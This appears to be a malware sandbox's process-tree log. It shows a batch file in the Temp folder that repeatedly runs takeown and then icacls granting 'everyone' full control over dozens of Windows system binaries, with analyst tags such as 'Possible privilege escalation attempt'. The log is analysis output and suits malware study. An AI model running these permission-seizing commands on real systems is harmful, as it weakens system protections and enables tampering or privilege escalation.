C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.469_none_cc9ed34da60ac9c4\Robocopy.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.469_none_cc9ed34da60ac9c4\Robocopy.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-robocopy_31bf3856ad364e35_10.0.22000.469_none_cc9ed34da60ac9c4\Robocopy.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-rpc-ping_31bf3856ad364e35_10.0.22000.1_none_fe52560879e25943\RpcPing.exe"2⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-rpc-ping_31bf3856ad364e35_10.0.22000.1_none_fe52560879e25943\RpcPing.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-rpc-ping_31bf3856ad364e35_10.0.22000.1_none_fe52560879e25943\RpcPing.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.1_none_c080913c96973812\runas.exe"2⤵
- Access Token Manipulation: Create Process with Token
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.1_none_c080913c96973812\runas.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.1_none_c080913c96973812\runas.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_659b5b6317001d2c\f\runas.exe"2⤵
- Access Token Manipulation: Create Process with Token
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_659b5b6317001d2c\f\runas.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_659b5b6317001d2c\f\runas.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_659b5b6317001d2c\r\runas.exe"2⤵
- Access Token Manipulation: Create Process with Token
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_659b5b6317001d2c\r\runas.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_659b5b6317001d2c\r\runas.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_659b5b6317001d2c\runas.exe"2⤵
- Access Token Manipulation: Create Process with Token
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_659b5b6317001d2c\runas.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-runas_31bf3856ad364e35_10.0.22000.434_none_659b5b6317001d2c\runas.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-rundll32_31bf3856ad364e35_10.0.22000.1_none_389d9987e414684f\rundll32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-rundll32_31bf3856ad364e35_10.0.22000.1_none_389d9987e414684f\rundll32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-rundll32_31bf3856ad364e35_10.0.22000.1_none_389d9987e414684f\rundll32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-runlegacycplelevated_31bf3856ad364e35_10.0.22000.1_none_71a457162e76ab00\RunLegacyCPLElevated.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-runlegacycplelevated_31bf3856ad364e35_10.0.22000.1_none_71a457162e76ab00\RunLegacyCPLElevated.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-runlegacycplelevated_31bf3856ad364e35_10.0.22000.1_none_71a457162e76ab00\RunLegacyCPLElevated.exe" /grant "everyone":(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-runonce_31bf3856ad364e35_10.0.22000.1_none_76531c94f831c76b\runonce.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-runonce_31bf3856ad364e35_10.0.22000.1_none_76531c94f831c76b\runonce.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-runonce_31bf3856ad364e35_10.0.22000.1_none_76531c94f831c76b\runonce.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..-diagnosticsmanaged_31bf3856ad364e35_10.0.22000.1_none_c52a6f9591cae974\stordiag.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..-diagnosticsmanaged_31bf3856ad364e35_10.0.22000.1_none_c52a6f9591cae974\stordiag.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..-diagnosticsmanaged_31bf3856ad364e35_10.0.22000.1_none_c52a6f9591cae974\stordiag.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_fad0aab9b7fd2208\f\RMActivate_ssp_isv.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_fad0aab9b7fd2208\f\RMActivate_ssp_isv.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_fad0aab9b7fd2208\f\RMActivate_ssp_isv.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_fad0aab9b7fd2208\r\RMActivate_ssp_isv.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_fad0aab9b7fd2208\r\RMActivate_ssp_isv.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_fad0aab9b7fd2208\r\RMActivate_ssp_isv.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_fad0aab9b7fd2208\RMActivate_ssp_isv.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_fad0aab9b7fd2208\RMActivate_ssp_isv.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..ative-serverbox-isv_31bf3856ad364e35_10.0.22000.120_none_fad0aab9b7fd2208\RMActivate_ssp_isv.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..csengine-nativehost_31bf3856ad364e35_10.0.22000.1_none_7abe2ca795bb4a9d\sdiagnhost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..csengine-nativehost_31bf3856ad364e35_10.0.22000.1_none_7abe2ca795bb4a9d\sdiagnhost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..csengine-nativehost_31bf3856ad364e35_10.0.22000.1_none_7abe2ca795bb4a9d\sdiagnhost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..executionprevention_31bf3856ad364e35_10.0.22000.1_none_2a7bb19b5dc345cd\SystemPropertiesDataExecutionPrevention.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..executionprevention_31bf3856ad364e35_10.0.22000.1_none_2a7bb19b5dc345cd\SystemPropertiesDataExecutionPrevention.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..executionprevention_31bf3856ad364e35_10.0.22000.1_none_2a7bb19b5dc345cd\SystemPropertiesDataExecutionPrevention.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..line-user-interface_31bf3856ad364e35_10.0.22000.1_none_3d7fbabd1601d8b8\cmdkey.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..line-user-interface_31bf3856ad364e35_10.0.22000.1_none_3d7fbabd1601d8b8\cmdkey.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..line-user-interface_31bf3856ad364e35_10.0.22000.1_none_3d7fbabd1601d8b8\cmdkey.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..llercommandlinetool_31bf3856ad364e35_10.0.22000.1_none_d50683110dd687fb\sc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..llercommandlinetool_31bf3856ad364e35_10.0.22000.1_none_d50683110dd687fb\sc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..llercommandlinetool_31bf3856ad364e35_10.0.22000.1_none_d50683110dd687fb\sc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..mpropertiesadvanced_31bf3856ad364e35_10.0.22000.1_none_57e0cfd01d70414f\SystemPropertiesAdvanced.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..mpropertiesadvanced_31bf3856ad364e35_10.0.22000.1_none_57e0cfd01d70414f\SystemPropertiesAdvanced.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..mpropertiesadvanced_31bf3856ad364e35_10.0.22000.1_none_57e0cfd01d70414f\SystemPropertiesAdvanced.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..mpropertieshardware_31bf3856ad364e35_10.0.22000.1_none_a192cd380c242ff3\SystemPropertiesHardware.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..mpropertieshardware_31bf3856ad364e35_10.0.22000.1_none_a192cd380c242ff3\SystemPropertiesHardware.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..mpropertieshardware_31bf3856ad364e35_10.0.22000.1_none_a192cd380c242ff3\SystemPropertiesHardware.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_ef0bb92fa937f7ee\f\RMActivate_isv.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_ef0bb92fa937f7ee\f\RMActivate_isv.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_ef0bb92fa937f7ee\f\RMActivate_isv.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_ef0bb92fa937f7ee\r\RMActivate_isv.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_ef0bb92fa937f7ee\r\RMActivate_isv.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_ef0bb92fa937f7ee\r\RMActivate_isv.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_ef0bb92fa937f7ee\RMActivate_isv.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_ef0bb92fa937f7ee\RMActivate_isv.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..native-whitebox-isv_31bf3856ad364e35_10.0.22000.120_none_ef0bb92fa937f7ee\RMActivate_isv.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..opertiesperformance_31bf3856ad364e35_10.0.22000.1_none_bb6ef5283c041299\SystemPropertiesPerformance.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..opertiesperformance_31bf3856ad364e35_10.0.22000.1_none_bb6ef5283c041299\SystemPropertiesPerformance.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..opertiesperformance_31bf3856ad364e35_10.0.22000.1_none_bb6ef5283c041299\SystemPropertiesPerformance.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..pertiescomputername_31bf3856ad364e35_10.0.22000.1_none_910b7a497567d369\SystemPropertiesComputerName.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..pertiescomputername_31bf3856ad364e35_10.0.22000.1_none_910b7a497567d369\SystemPropertiesComputerName.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..pertiescomputername_31bf3856ad364e35_10.0.22000.1_none_910b7a497567d369\SystemPropertiesComputerName.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..ropertiesprotection_31bf3856ad364e35_10.0.22000.1_none_c44a9ec655ad890c\SystemPropertiesProtection.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..ropertiesprotection_31bf3856ad364e35_10.0.22000.1_none_c44a9ec655ad890c\SystemPropertiesProtection.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..ropertiesprotection_31bf3856ad364e35_10.0.22000.1_none_c44a9ec655ad890c\SystemPropertiesProtection.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\f\RMActivate.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\f\RMActivate.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\f\RMActivate.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\r\RMActivate.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\r\RMActivate.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\r\RMActivate.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\RMActivate.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\RMActivate.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-s..sor-native-whitebox_31bf3856ad364e35_10.0.22000.120_none_a6af4a93eb065fad\RMActivate.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4dda7ffaba1d5c31\cscript.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4dda7ffaba1d5c31\cscript.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4dda7ffaba1d5c31\cscript.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4dda7ffaba1d5c31\wscript.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4dda7ffaba1d5c31\wscript.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-scripting_31bf3856ad364e35_10.0.22000.194_none_4dda7ffaba1d5c31\wscript.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-sctasks_31bf3856ad364e35_10.0.22000.1_none_ead7bf8bee802feb\schtasks.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-sctasks_31bf3856ad364e35_10.0.22000.1_none_ead7bf8bee802feb\schtasks.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-sctasks_31bf3856ad364e35_10.0.22000.1_none_ead7bf8bee802feb\schtasks.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-secinit_31bf3856ad364e35_10.0.22000.1_none_e850387006280e7a\secinit.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-secinit_31bf3856ad364e35_10.0.22000.1_none_e850387006280e7a\secinit.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-secinit_31bf3856ad364e35_10.0.22000.1_none_e850387006280e7a\secinit.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-security-secedit_31bf3856ad364e35_10.0.22000.1_none_0f7f7612eae8630f\SecEdit.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-security-secedit_31bf3856ad364e35_10.0.22000.1_none_0f7f7612eae8630f\SecEdit.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-security-secedit_31bf3856ad364e35_10.0.22000.1_none_0f7f7612eae8630f\SecEdit.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-security-tokenbroker_31bf3856ad364e35_10.0.22000.282_none_a92d755764592be1\f\TokenBrokerCookies.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-security-tokenbroker_31bf3856ad364e35_10.0.22000.282_none_a92d755764592be1\f\TokenBrokerCookies.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-security-tokenbroker_31bf3856ad364e35_10.0.22000.282_none_a92d755764592be1\f\TokenBrokerCookies.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-security-tokenbroker_31bf3856ad364e35_10.0.22000.282_none_a92d755764592be1\r\TokenBrokerCookies.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-security-tokenbroker_31bf3856ad364e35_10.0.22000.282_none_a92d755764592be1\r\TokenBrokerCookies.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-security-tokenbroker_31bf3856ad364e35_10.0.22000.282_none_a92d755764592be1\r\TokenBrokerCookies.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-security-tokenbroker_31bf3856ad364e35_10.0.22000.282_none_a92d755764592be1\TokenBrokerCookies.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-security-tokenbroker_31bf3856ad364e35_10.0.22000.282_none_a92d755764592be1\TokenBrokerCookies.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-security-tokenbroker_31bf3856ad364e35_10.0.22000.282_none_a92d755764592be1\TokenBrokerCookies.exe" /grant "everyone":(f)3⤵
-
-
-
